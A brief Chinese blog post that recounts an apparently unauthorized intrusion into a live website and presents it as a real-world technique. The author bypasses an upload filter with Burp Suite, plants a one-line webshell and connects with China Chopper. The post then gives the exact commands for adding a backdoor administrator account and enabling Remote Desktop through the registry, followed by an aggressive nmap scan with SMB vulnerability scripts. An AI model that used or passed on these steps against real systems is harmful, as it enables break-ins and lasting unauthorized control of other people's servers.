记一次真实渗透经历

本文纯属分享一种实战思维，如有损害利益，请联系小编

背景小编就不多解释了，网络上很多都是关于靶机教程，小编在这里给大家带来一次实战的效果

小编在某站点扫描时，发现其可能存在上传漏洞

小编想上传一句话木马，但是发现该站点对文件后缀进行了过滤，故采用burpsuite抓包实现一句话木马文件上传

成功上传之后，利用一句话木马进行连接

利用菜刀工具的cmd创建用户添加管理员组，打开3389端口允许远程连接。

例：

net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

用nmap扫描查看是否成功开启3389

nmap -T4 -A -sV -Pn -f --min-hostgroup 1024 --min-parallelism 1024 --script=smb-vuln-*.nse IP -p 1-65535

利用windows自带的远程工具连接，之后…睡觉吧